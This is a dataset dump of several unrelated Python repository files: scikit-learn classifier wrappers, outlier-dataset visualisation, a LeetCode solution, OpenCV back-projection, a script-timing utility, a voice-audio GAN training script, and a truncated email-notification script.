         return s.kNeighbors_classifier(self, 
x_train, y_train, x_test, n_neighbors=15)\r\n elif classifier == 5:\r\n #print(\"DT\")\r\n return s. DT_classifier(self, x_train, y_train, x_test)\r\n elif classifier == 6:\r\n #print(\"RF\")\r\n return s.RF_classifier(self, x_train, y_train, x_test)\r\n elif classifier == 7:\r\n #print(\"MLP\")\r\n return s.multiLayerPerceptron_classifier(self, x_train, y_train, x_test)\r\n elif classifier == 8:\r\n #print(\"QDA\")\r\n return s.QDA_classifier(self, x_train, y_train, x_test)\r\n elif classifier == 9:\r\n print(\"NO CLASSIFIER\")\r\n elif classifier == 10:\r\n print(\"NO CLASSIFIER\")\r\n #return y_pred\r\n\r\n\r\n #8 Quadratic Discriminant Analysis\r\n def QDA_classifier(self, x_train, y_train, x_test):\r\n print('QDA')\r\n qda = QuadraticDiscriminantAnalysis(store_covariances=True)\r\n return qda.fit(x_train, y_train).predict(x_test) #y_predict\r\n\r\n\r\n #1 Linear Discriminant Analysis\r\n def LDA_classifier(self, x_train, y_train, x_test, solver=\"lsqr\", shrinkage=0.5, store_covariance=True):\r\n print('LDA')\r\n lda = LinearDiscriminantAnalysis(solver=solver, shrinkage=shrinkage, store_covariance=store_covariance)\r\n # l = LinearDiscriminantAnalysis(solver='svd', n_components=2)\r\n # l = LinearDiscriminantAnalysis(solver='eigen', shrinkage=0.8, n_components=2)\r\n lda.fit(x_train, y_train)\r\n y_pred = lda.predict(x_test)\r\n return y_pred\r\n\r\n\r\n #2\r\n def SVM_classifier(self, x_train, y_train, x_test):\r\n print('SVM')\r\n #kernel = ‘linear’, ‘poly’, ‘rbf’, ‘sigmoid’, ‘precomputed'\r\n #clf = svm.SVC(C=1.0, kernel='linear', degree=2, gamma='auto', coef0=0.0, shrinking=True,\r\n # probability=False, tol=0.0001, cache_size=300, class_weight=None, verbose=False,\r\n # max_iter=-1, decision_function_shape=None, random_state=None)\r\n #clf = svm.LinearSVC(class_weight='balanced', max_iter=10000)\r\n clf = svm.LinearSVC()\r\n #clf = svm.NuSVC()\r\n clf.fit(x_train, y_train) # .transform(x_train)\r\n y_pred = clf.predict(x_test)\r\n return y_pred\r\n\r\n\r\n #3 Stochastic Gradient Descent\r\n def sgd_classifier(self, x_train, y_train, x_test, loss=\"hinge\", penalty=\"l2\"):\r\n print('SGD')\r\n clf = SGDClassifier(loss=loss, penalty=penalty)\r\n clf.fit(x_train, y_train) # .transform(x_train)\r\n y_pred = clf.predict(x_test)\r\n return y_pred\r\n\r\n\r\n #4\r\n def kNeighbors_classifier(self, x_train, y_train, x_test, n_neighbors=15):\r\n print('KNN')\r\n clf = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors)\r\n clf.fit(x_train, y_train) # .transform(x_train)\r\n y_pred = clf.predict(x_test)\r\n return y_pred\r\n\r\n\r\n #5 Decision Tree\r\n def DT_classifier(self, x_train, y_train, x_test):\r\n print('DT')\r\n #clf = tree.ExtraTreeClassifier(criterion='gini')\r\n clf = tree.DecisionTreeClassifier(criterion='gini')\r\n clf.fit(x_train, y_train) # .transform(x_train)\r\n y_pred = clf.predict(x_test)\r\n return y_pred\r\n\r\n\r\n #Print Decision Tree\r\n def DT_classifier_printTree(self, x_train, y_train, feature_names, target_values, printFor='tenor', pdfName = \"DT.pdf\"):\r\n print('Print Decision Tree')\r\n clf = tree.DecisionTreeClassifier()\r\n clf.fit(x_train, y_train) # .transform(x_train)\r\n target_names = []\r\n if printFor=='tenor' or printFor=='gender':\r\n target_names = target_values\r\n else: #for simile\r\n for n in target_values:\r\n target_names.append(str(int(n)))\r\n print(feature_names)\r\n #print(target_names)\r\n #print(x_train)\r\n #dot_data = tree.export_graphviz(clf, out_file=None,\r\n # feature_names=feature_names,\r\n # 
class_names=target_names,\r\n # filled=True, rounded=True,\r\n # special_characters=True)\r\n #dot_data = tree.export_graphviz(clf, out_file=None)\r\n dot_data = tree.export_graphviz(clf, out_file=None, feature_names=feature_names)\r\n graph = pydotplus.graph_from_dot_data(dot_data)\r\n graph.write_pdf(pdfName)\r\n graph = pydotplus.graph_from_dot_data(dot_data)\r\n Image(graph.create_png())\r\n\r\n\r\n #7\r\n def multiLayerPerceptron_classifier(self, x_train, y_train, x_test):\r\n print('MLP')\r\n clf = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(20,), random_state=1, max_iter=500)\r\n clf.fit(x_train, y_train) # .transform(x_train)\r\n y_pred = clf.predict(x_test)\r\n return y_pred\r\n\r\n\r\n #6 Random forest\r\n def RF_classifier(self, x_train, y_train, x_test):\r\n print('RF')\r\n clf = RandomForestClassifier(n_estimators=100, max_depth=None, min_samples_split=2, max_features='auto', random_state=0)\r\n clf.fit(x_train, y_train) # .transform(x_train)\r\n y_pred = clf.predict(x_test)\r\n return y_pred","repo_name":"pkouris/SimilePy","sub_path":"Classifiers.py","file_name":"Classifiers.py","file_ext":"py","file_size_in_byte":6356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"124824058","text":"import argparse\nimport pandas as pd\nfrom sklearn.manifold import TSNE\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\nimport numpy as np\nfrom scipy.io import arff\nfrom pathlib import Path\n\n\nis_anomaly_column = 'is_anomaly'\n\n\ndef arff_to_csv(arff_dataset_path):\n data = arff.loadarff(arff_dataset_path)\n df = pd.DataFrame(data[0])\n path = Path(arff_dataset_path)\n outputdir = path.parent\n basename = os.path.basename(path)\n file_name, ext = os.path.splitext(basename)\n outputfile = os.path.join(outputdir, file_name + '.csv')\n df.to_csv(outputfile, index=False)\n\n\ndef tsne_visualizer(df, savedir):\n final_df = df.iloc[:, 0:df.shape[1]-2]\n feat_cols = list(range(final_df.shape[1]))\n final_df['y'] = df.iloc[:, df.shape[1]-1]\n final_df['label'] = final_df['y'].apply(lambda i: str(i))\n tsne_results = TSNE(n_components=2, random_state=0, perplexity=50).fit_transform(df.iloc[:, feat_cols])\n\n final_df['tsne-2d-one'] = tsne_results[:, 0]\n final_df['tsne-2d-two'] = tsne_results[:, 1]\n\n colors = [\"#383838\", \"#FF0B04\"]\n\n sns.scatterplot(\n x=\"tsne-2d-one\", y=\"tsne-2d-two\",\n hue=\"y\",\n palette=sns.color_palette(colors),\n data=final_df,\n legend=\"full\",\n )\n\n dataset_name = os.path.splitext(os.path.basename(f))[0]\n output = os.path.join(savedir, 'tsne_' + dataset_name + '.png')\n if not os.path.exists(savedir):\n os.makedirs(savedir)\n\n plt.title(dataset_name)\n plt.savefig(output, dpi=300)\n plt.clf()\n\n\ndef dataset_visualizer(dataset_path, savedir):\n fileslist = get_files(dataset_path)\n for f in fileslist:\n tsne_visualizer(pd.read_csv(f), savedir)\n\n\ndef plot_2d_subspace(path_to_df, dims_str):\n df = pd.read_csv(path_to_df)\n dims = list(map(int, dims_str.strip().replace('[', '').replace(']', '').split(',')))\n x = df[df.columns[dims[0]]]\n y = df[df.columns[dims[1]]]\n\n n = list(range(df.shape[0]))\n\n ind = np.where(df[is_anomaly_column] == 1)[0]\n text_ind = ind\n\n colors = np.array(['dimgray'] * df.shape[0], dtype=object)\n\n colors[ind] = 'red'\n\n fig, ax = plt.subplots()\n for i in range(len(x)):\n z_order = 2 if i in ind else 0\n color = colors[i]\n ax.scatter(x[i], y[i], c=color, zorder=z_order)\n\n for i, label in enumerate(n):\n if i in 
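# The run_classifier method above selects among sklearn estimators through a long
# if/elif chain keyed on an integer code. A minimal dict-based dispatch sketch of the
# same mapping (constructor arguments taken from the defaults used in the methods above):
from sklearn import svm, neighbors, tree
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis, QuadraticDiscriminantAnalysis
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import SGDClassifier
from sklearn.neural_network import MLPClassifier

CLASSIFIER_FACTORIES = {
    1: lambda: LinearDiscriminantAnalysis(solver="lsqr", shrinkage=0.5),
    2: lambda: svm.LinearSVC(),
    3: lambda: SGDClassifier(loss="hinge", penalty="l2"),
    4: lambda: neighbors.KNeighborsClassifier(n_neighbors=15),
    5: lambda: tree.DecisionTreeClassifier(criterion="gini"),
    6: lambda: RandomForestClassifier(n_estimators=100, random_state=0),
    7: lambda: MLPClassifier(solver="lbfgs", alpha=1e-5, hidden_layer_sizes=(20,), random_state=1, max_iter=500),
    8: lambda: QuadraticDiscriminantAnalysis(),
}

def run_classifier(x_train, y_train, x_test, classifier=1):
    # Instantiate the requested estimator, fit on the training split, predict the test split.
    return CLASSIFIER_FACTORIES[classifier]().fit(x_train, y_train).predict(x_test)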
text_ind:\n ax.annotate(label, xy=(x[i], y[i]), c='dodgerblue', zorder=2)\n #plt.title(os.path.splitext(os.path.basename(dataset_path))[0])\n plt.xlabel('Feature ' + str(dims[0]))\n plt.ylabel('Feature ' + str(dims[1]))\n plt.show()\n #plt.savefig('visualizations/breast'+str(dims[0])+str(dims[1])+'.png', dpi=300)\n\n\ndef get_files(dir_path):\n fileslist = []\n if not os.path.isdir(dir_path):\n return [dir_path]\n allfiles = os.listdir(dir_path)\n for f in allfiles:\n if f.endswith('.csv'):\n fileslist.append(os.path.join(dir_path, f))\n return fileslist\n\n\ndef get_files_recursively(dir_path):\n files = []\n for r, d, f in os.walk(dir_path):\n for file in f:\n if file.endswith('.csv'):\n files.append(os.path.join(r, file))\n return files\n\n\ndef outlier_differences(diffs):\n data_diffs = diffs.split(',')\n for i in range(len(data_diffs)):\n for j in range(i+1, len(data_diffs)):\n d1 = data_diffs[i]\n d2 = data_diffs[j]\n df1 = pd.read_csv(d1)\n df2 = pd.read_csv(d2)\n diff = df1.shape[0] - list(np.array(df1['is_anomaly'].tolist()) - np.array(df2['is_anomaly'].tolist())).count(0)\n print(os.path.splitext(os.path.basename(d1))[0], os.path.splitext(os.path.basename(d2))[0], diff)\n\n\ndef print_datasets_statistics(datadir):\n print('Dataset', '#samples', '#features', '#outliers', '%outlier ratio')\n for f in get_files_recursively(datadir):\n df = pd.read_csv(f)\n outliers = df[df[is_anomaly_column] == 1].shape[0]\n outlier_ratio = round(outliers / df.shape[0], 2)\n features = df.shape[1] - 1\n samples = df.shape[0]\n dataset_name = os.path.splitext(os.path.basename(f))[0]\n print(dataset_name, samples, features, outliers, outlier_ratio)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-tocsv', '--arfftocsv', help='Arff dataset path to convert to csv', default=None)\n parser.add_argument('-viz', '--visualise', help='Dataset or Dataset folder to visualize.', default=None)\n parser.add_argument('-sv', '--saveviz', help='Directory to save the image.', default=None)\n parser.add_argument('-diff', '--differences', default=None, help='-datadiff d1,d2,d3', type=str)\n parser.add_argument('-sub', '--subspace', default=None, help='e.g. 
[2,3]')\n parser.add_argument('-pstats', '--print_stats', default=None, help='-pstats ')\n args = parser.parse_args()\n if args.arfftocsv is not None:\n arff_to_csv(args.arfftocsv)\n elif args.subspace is not None:\n plot_2d_subspace(args.visualise, args.subspace)\n elif args.visualise is not None:\n tsne_visualizer(args.visualise, args.saveviz)\n elif args.differences is not None:\n outlier_differences(args.differences)\n elif args.print_stats is not None:\n print_datasets_statistics(args.print_stats)\n\n","repo_name":"myrtakis/MxM","sub_path":"PredictiveOutlierExplanationBenchmark/dataset_analysis.py","file_name":"dataset_analysis.py","file_ext":"py","file_size_in_byte":5308,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"98"} +{"seq_id":"15399744242","text":"#\n# @lc app=leetcode id=113 lang=python3\n#\n# [113] Path Sum II\n#\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def pathSum(self, root: TreeNode, sum_: int) -> List[List[int]]:\n if not root: return []\n queue = [(root, [root.val])]\n paths =[]\n while queue:\n node, path = queue.pop()\n if node.left:\n queue.append((node.left, path+[node.left.val]))\n if node.right:\n queue.append((node.right, path+[node.right.val]))\n if not node.left and not node.right:\n if sum_==sum(path):\n paths.append(path)\n return paths\n\n\n","repo_name":"mdasadul/leetcode","sub_path":"113.path-sum-ii.py","file_name":"113.path-sum-ii.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"21157347614","text":"import cv2\r\nfrom matplotlib import pyplot\r\n\r\nori_img = cv2.imread(\"ikigaipng.png\")\r\nhsv_ori = cv2.cvtColor(ori_img, cv2.COLOR_BGR2HSV)\r\n\r\nroi = cv2.imread(\"Ofkikai.png\")\r\nhsv_roi = cv2.cvtColor(ori_img, cv2.COLOR_BGR2HSV)\r\n\r\nhue, saturation, value = cv2.split(hsv_roi)\r\n\r\n# histogram_roi\r\nroi_hist = cv2.calcHist([hsv_roi], [0, 1], None, [180, 256], [0, 180, 0, 256])\r\nmask = cv2.calcBackProject([hsv_ori], [0, 1], roi_hist, [0, 180, 0, 256], 1)\r\n\r\n# filtering remove noise\r\n#kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (5, 5))\r\n#mask = cv2.filter2D(mask, -1, kernel)\r\n#_, mask = cv2.threshold(mask, 100, 255, cv2.THRESH_BINARY)\r\n\r\n#mask = cv2.merge((mask, mask, mask))\r\n#result = cv2.bitwise_and(ori_img, mask)\r\n\r\ncv2.imshow(\"Mask\", mask)\r\ncv2.imshow(\"Original image\", ori_img)\r\n#cv2.imshow(\"Result\", result)\r\ncv2.imshow(\"roi\", roi)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","repo_name":"AditiBarnwal/opencv_project","sub_path":"histogram_ndBackprojection.py","file_name":"histogram_ndBackprojection.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"9179286048","text":"import time\nimport sys\nimport os\nimport argparse\n\n# File for making an importable function, that when called, ie. 
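# In histogram_ndBackprojection.py above, hsv_roi is computed from ori_img instead of
# roi, so the histogram that gets back-projected belongs to the whole scene rather than
# the region of interest. A corrected minimal sketch (same image files as the script):
import cv2

ori_img = cv2.imread("ikigaipng.png")
roi = cv2.imread("Ofkikai.png")

hsv_ori = cv2.cvtColor(ori_img, cv2.COLOR_BGR2HSV)
hsv_roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)  # histogram source is the ROI

# 2-D hue/saturation histogram of the ROI, normalized, then back-projected onto the scene.
roi_hist = cv2.calcHist([hsv_roi], [0, 1], None, [180, 256], [0, 180, 0, 256])
cv2.normalize(roi_hist, roi_hist, 0, 255, cv2.NORM_MINMAX)
mask = cv2.calcBackProject([hsv_ori], [0, 1], roi_hist, [0, 180, 0, 256], 1)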
when in the new\n# file executed with an arg -t, will copy the contents of the file to a new file\n# wrapped around a time function.\n\ndef timer():\n\n def get_args():\n parser = argparse.ArgumentParser(description='Read a file with time tracking')\n parser.add_argument('-t', '--timeit', action='store_true', help='Time the file')\n args = parser.parse_args()\n return args\n\n def get_current_file():\n return sys.argv[0]\n\n def read_file(file):\n with open(file, 'r') as f:\n lines = f.readlines()\n lines = [line for line in lines if not line.startswith('timer()')] # Not today recursion!\n lines = [line for line in lines if not line.startswith('from timer import timer')]\n return lines\n\n def time_file(file):\n lines = read_file(file)\n with open('time_' + file, 'w') as f:\n f.write('import time \\n')\n f.write('start = time.time() \\n')\n for line in lines:\n f.write(line)\n f.write('\\nend = time.time()')\n f.write('\\nprint(\"Total time:\",round(end - start,5))')\n\n def execute_file(file):\n os.system('python3 ' + file)\n\n def delete_file(file):\n os.remove(file)\n\n if get_args().timeit:\n time_file(get_current_file())\n execute_file('time_' + get_current_file())\n delete_file('time_' + get_current_file())\n sys.exit(0)","repo_name":"avocardio/timer","sub_path":"timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"37899458383","text":"import numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras import layers\r\nimport os\r\nimport tensorflow as tf\r\nimport keras\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom tensorflow.keras.layers import Conv2D,Dense,Conv2DTranspose\r\nfrom tensorflow.python.keras.models import Model\r\nfrom tensorflow.keras import layers\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow.keras.backend as K\r\nfrom keras.callbacks import ModelCheckpoint, TensorBoard\r\nimport time\r\nimport tensorflow.keras as tk\r\nimport tensorflow_addons as tfa\r\nfrom biosppy.signals import tools as tools\r\nimport neural_structured_learning as nsl\r\nfrom scipy import stats\r\nfrom biosppy.signals import tools as tools\r\nimport neural_structured_learning as nsl\r\nfrom scipy import stats\r\nimport sklearn.preprocessing as skp\r\nimport neural_structured_learning as nsl\r\nfrom sklearn.utils import shuffle\r\nfrom scipy import signal\r\nimport json\r\nimport librosa\r\nimport tensorflow_io as tfio\r\nfrom pydub import AudioSegment\r\nfrom loss import *\r\n\r\n\r\nkernel = 16\r\nstride= 4\r\ndef filter_ecg(signal, sampling_rate):\r\n \r\n signal = np.array(signal)\r\n order = int(0.3 * sampling_rate)\r\n filtered, _, _ = tools.filter_signal(signal=signal,\r\n ftype='FIR',\r\n band='bandpass',\r\n order=order,\r\n frequency=[3, 45],\r\n sampling_rate=sampling_rate)\r\n return filtered\r\n \r\n \r\ndef preprocess(path):\r\n \r\n file_list = os.listdir(path)\r\n \r\n file_json = sorted([file for file in file_list if file.endswith(\".json\")])\r\n file_mp3 = sorted([file for file in file_list if file.endswith(\".wav\")])\r\n \r\n print(len(file_mp3))\r\n\r\n lens=24000\r\n \r\n data_clone = np.zeros((1,131072))\r\n data = np.zeros((lens,131072))\r\n \r\n q=0\r\n data_label = np.zeros_like(data)\r\n for s,i in enumerate(range(len(file_json[:lens]))):\r\n\r\n\r\n\r\n a = AudioSegment.from_file(\"{}{}\".format(path,file_mp3[i]),format = 'wav')\r\n y = np.array(a.get_array_of_samples())\r\n\r\n if 
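# timer.py above times a whole script by rewriting it into a wrapper file and re-executing
# it. When only individual functions need timing, a decorator built on time.perf_counter
# is a lighter-weight sketch that avoids touching the filesystem:
import time
from functools import wraps

def timed(func):
    # Report the wall-clock duration of every call to the wrapped function.
    @wraps(func)
    def wrapper(*args, **kwargs):
        start = time.perf_counter()
        try:
            return func(*args, **kwargs)
        finally:
            print("Total time:", round(time.perf_counter() - start, 5))
    return wrapper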
len(y)<131072:\r\n continue\r\n elif q==24000:\r\n break\r\n else:\r\n print('q',q)\r\n q+=1 \r\n y =y[:131072]\r\n\r\n \r\n print(s)\r\n\r\n data[i]=y\r\n data_label[i] = y+np.max(y)*0.5\r\n \r\n\r\n data = np.expand_dims(data,axis=-1) \r\n data_label = np.expand_dims(data_label,axis=-1)\r\n\r\n\r\n\r\n print(data.shape)\r\n return data, data_label\r\n \r\n \r\ndef train_step(input_image, target, epoch,generator,discriminator,generator_optimizer,discriminator_optimizer,s,p):\r\n with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:\r\n gen_output = generator(input_image, training=True)\r\n \r\n disc_real_output = discriminator([input_image,target], training=True)\r\n disc_generated_output = discriminator([input_image,gen_output], training=True)\r\n \r\n gen_total_loss, gen_gan_loss, gen_l1_loss = generator_loss(disc_generated_output, gen_output, target,p)\r\n disc_loss = discriminator_loss(disc_real_output, disc_generated_output)\r\n \r\n \r\n generator_gradients = gen_tape.gradient(gen_total_loss,\r\n generator.trainable_variables)\r\n discriminator_gradients = disc_tape.gradient(disc_loss,\r\n discriminator.trainable_variables)\r\n \r\n generator_optimizer.apply_gradients(zip(generator_gradients,\r\n generator.trainable_variables))\r\n discriminator_optimizer.apply_gradients(zip(discriminator_gradients,\r\n discriminator.trainable_variables))\r\n \r\n \r\n print('epoch {} gen_total_loss {} gen_gan_loss {} gen_l1_loss {}'.format(s,gen_total_loss,gen_gan_loss,gen_l1_loss))\r\n\r\n\r\ndef onelead_model():\r\n initializer = tf.random_normal_initializer(0., 0.02)\r\n time_len = 131072\r\n\r\n encoder_inputs=keras.Input(shape=(time_len,1),name='data')\r\n \r\n x=tf.keras.layers.Conv1D(64, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(encoder_inputs)#8\r\n x_0=tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n x=tf.keras.layers.Conv1D(128, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(x_0)#4\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x_1=tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n x=tf.keras.layers.Conv1D(256, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(x_1)#2\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x_2 =tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n \r\n x=tf.keras.layers.Conv1D(512, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(x_2)#2\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x_3=tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n \r\n x=tf.keras.layers.Conv1D(1024, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(x_3)#2\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x_4=tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n\r\n \r\n x=tf.keras.layers.Conv1DTranspose(512, (kernel), strides=(stride),padding='same',kernel_initializer=initializer,use_bias=False)(x_4)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x=tf.keras.layers.Activation('relu')(x)\r\n \r\n \r\n x=tf.keras.layers.Concatenate()([x,x_3])\r\n x=tf.keras.layers.Conv1DTranspose(256, (kernel), strides=(stride),padding='same',kernel_initializer=initializer,use_bias=False)(x)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x=tf.keras.layers.Activation('relu')(x)\r\n \r\n \r\n x=tf.keras.layers.Concatenate()([x,x_2])\r\n x=tf.keras.layers.Conv1DTranspose(128, (kernel), strides=(stride),padding='same',kernel_initializer=initializer,use_bias=False)(x)\r\n 
x=tf.keras.layers.BatchNormalization()(x)\r\n x=tf.keras.layers.Activation('relu')(x)\r\n \r\n x=tf.keras.layers.Concatenate()([x,x_1])\r\n x=tf.keras.layers.Conv1DTranspose(64, (kernel), strides=(stride),padding='same',kernel_initializer=initializer,use_bias=False)(x)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x=tf.keras.layers.Activation('relu')(x)\r\n \r\n x=tf.keras.layers.Concatenate()([x,x_0])\r\n encoder_outputs = layers.Conv1DTranspose(1, (kernel), strides=(stride), padding=\"same\",kernel_initializer=initializer, use_bias=False)(x)\r\n\r\n return keras.Model(encoder_inputs,encoder_outputs)\r\n \r\n\r\ndef train_(train,train_label,p,path):\r\n \r\n epochs=10\r\n time_len = 131072\r\n batch_size = 32\r\n initializer = tf.random_normal_initializer(0., 0.02)\r\n \r\n\r\n encoder_inputs=keras.Input(shape=(time_len,1),name='data')\r\n \r\n x=tf.keras.layers.Conv1D(64, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(encoder_inputs)#8\r\n x_0=tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n x=tf.keras.layers.Conv1D(128, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(x_0)#4\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x_1=tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n x=tf.keras.layers.Conv1D(256, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(x_1)#2\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x_2 =tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n \r\n x=tf.keras.layers.Conv1D(512, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(x_2)#2\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x_3=tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n \r\n x=tf.keras.layers.Conv1D(1024, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(x_3)#2\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x_4=tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n\r\n \r\n x=tf.keras.layers.Conv1DTranspose(512, (kernel), strides=(stride),padding='same',kernel_initializer=initializer,use_bias=False)(x_4)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x=tf.keras.layers.Activation('relu')(x)\r\n \r\n \r\n x=tf.keras.layers.Concatenate()([x,x_3])\r\n x=tf.keras.layers.Conv1DTranspose(256, (kernel), strides=(stride),padding='same',kernel_initializer=initializer,use_bias=False)(x)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x=tf.keras.layers.Activation('relu')(x)\r\n \r\n \r\n x=tf.keras.layers.Concatenate()([x,x_2])\r\n x=tf.keras.layers.Conv1DTranspose(128, (kernel), strides=(stride),padding='same',kernel_initializer=initializer,use_bias=False)(x)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x=tf.keras.layers.Activation('relu')(x)\r\n \r\n x=tf.keras.layers.Concatenate()([x,x_1])\r\n x=tf.keras.layers.Conv1DTranspose(64, (kernel), strides=(stride),padding='same',kernel_initializer=initializer,use_bias=False)(x)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x=tf.keras.layers.Activation('relu')(x)\r\n \r\n x=tf.keras.layers.Concatenate()([x,x_0])\r\n encoder_outputs = layers.Conv1DTranspose(1, (kernel), strides=(stride), padding=\"same\",kernel_initializer=initializer, use_bias=False)(x)\r\n\r\n \r\n \r\n generator=keras.Model(encoder_inputs,encoder_outputs)\r\n generator.summary()\r\n \r\n inp = tf.keras.layers.Input(shape=[time_len,1], name='input_image')\r\n tar = tf.keras.layers.Input(shape=[time_len,1], name='target_image')\r\n\r\n x = 
tf.keras.layers.concatenate([inp, tar])\r\n x = tf.keras.layers.Conv1D(64, (4), strides=(4),kernel_initializer=initializer,padding='same', use_bias=False)(x)\r\n x = tf.keras.layers.LeakyReLU()(x)\r\n x=tf.keras.layers.Conv1D(128, (4), strides=(4),kernel_initializer=initializer,padding='same', use_bias=False)(x)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x = tf.keras.layers.LeakyReLU()(x)\r\n x=tf.keras.layers.Conv1D(256, (4), strides=(4),kernel_initializer=initializer,padding='same', use_bias=False)(x)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x = tf.keras.layers.LeakyReLU()(x)\r\n x = tf.keras.layers.ZeroPadding1D()(x)\r\n conv = tf.keras.layers.Conv1D(512, (4), strides=(4),kernel_initializer=initializer,padding='same',use_bias=False)(x)\r\n batchnorm1=tf.keras.layers.BatchNormalization()(conv)\r\n \r\n leaky_relu = tf.keras.layers.LeakyReLU()(batchnorm1)\r\n zero_pad2 = tf.keras.layers.ZeroPadding1D()(leaky_relu)\r\n last = tf.keras.layers.Conv1D(1, (4), strides=(4),kernel_initializer=initializer,activation='sigmoid')(zero_pad2)\r\n \r\n \r\n discriminator=tf.keras.Model(inputs=[inp,tar], outputs=last)\r\n discriminator.summary()\r\n \r\n generator_optimizer = tf.keras.optimizers.Adam(MyLRSchedule(1e-4), beta_1=0.5)\r\n discriminator_optimizer = tf.keras.optimizers.Adam(MyLRSchedule(1e-4), beta_1=0.5)\r\n\r\n for epoch in range(epochs):\r\n \r\n print(\"Epoch: \", epoch)\r\n\r\n \r\n for i in range(int(len(train)/32)-1):\r\n tr=train[batch_size*i:batch_size*(i+1)]\r\n tr_label=train_label[batch_size*i:batch_size*(i+1)]\r\n train_step(tr, tr_label, epoch,generator,discriminator,generator_optimizer,discriminator_optimizer,epoch,p)\r\n\r\n if (epoch + 1) % 1 == 0:\r\n generator.save_weights(f'/home/jhjoo/voice/tf_hightone/generator{epoch+1}.h5')\r\n\r\nif __name__=='__main__':\r\n \r\n path = \"/home/jhjoo/voice_data/train_data/cc/60~69/Male/\"\r\n p = 50\r\n import os \r\n os.environ[\"CUDA_VISIBLE_DEVICES\"]='0'\r\n data, data_label = preprocess(path)\r\n train_(data,data_label,p,path) \r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\n","repo_name":"joojinho97/time_frequency_domain_GAN","sub_path":"time_voice.py","file_name":"time_voice.py","file_ext":"py","file_size_in_byte":11666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"40498907628","text":"import subprocess, logging, time, smtplib, ssl\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom tracemalloc import stop\nimport environ\n\nenv = environ.Env()\nenviron.Env.read_env()\n\nlogging.basicConfig(\n filename='logger.log',\n # filemode='w',\n format='%(asctime)s - %(message)s',\n level=logging.INFO\n)\n\ndebug = env.int('DEBUG')\n\n#https://realpython.com/python-send-email/\n\ndef mail_to():\n recipiants = env.list('RECIPIANTS')\n smtp_server = env('SMTP_SERVER')\n sender_email = env('SENDER_EMAIL')\n port = env('PORT') # For SSL\n password = env('PASSWORD')\n exo_server = env('EXO_SERVER')\n\n message = MIMEMultipart(\"alternative\")\n message[\"Subject\"] = f'Automatisk omstart av {exo_server}'\n message[\"From\"] = sender_email\n message[\"To\"] = \", \".join(recipiants)\n\n # Create the plain-text and HTML version of your message\n text = \"\"\"\\\n Omstart har skett av {exo_server}.\"\"\"\n html = \"\"\"\\\n \n \n

<html>\n    <body>\n    <p>Omstart har skett av {exo_server}.</p>\n    </body>\n    </html>
